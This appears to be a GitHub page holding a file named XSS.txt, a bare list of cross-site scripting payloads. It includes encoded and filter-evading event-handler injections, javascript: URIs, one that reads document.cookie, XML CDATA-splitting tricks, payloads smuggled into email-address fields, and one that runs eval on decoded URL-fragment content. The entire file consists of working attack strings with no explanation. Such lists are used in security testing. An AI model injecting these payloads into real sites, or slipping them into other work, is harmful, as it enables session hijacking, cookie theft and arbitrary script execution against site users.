-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathXSS.txt
21 lines (19 loc) · 1.02 KB
/
XSS.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
%27%29%3bconfirm%28%271
["');alert('XSS');//"]@xyz.xxx
”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/>
<iframe <><a href=javascript:alert(document.cookie)>Click Here</a>=></iframe>
a"><svg/onload=prompt(1)>
\'-alert(1)//
%7B%7Bconstructor.constructor(%27alert(1337)%27)()%7D%7D
%27"><details%20ontoggle=prompt('XSS')%20open>
"\u003e\u003cimg src=1 onerror=alert(0)\u003e
%26%2302java%26%23115cript:alert(document.domain)
DrakenKun"onfocus="prompt(1)"autofocus="
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
//XML
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
//Email
[email protected]%27\%22%3E%3Csvg/onload=alert(/xss/)%3E
"<iframe/onload=eval(atob(location.hash.substring(1)))>"@gmail.com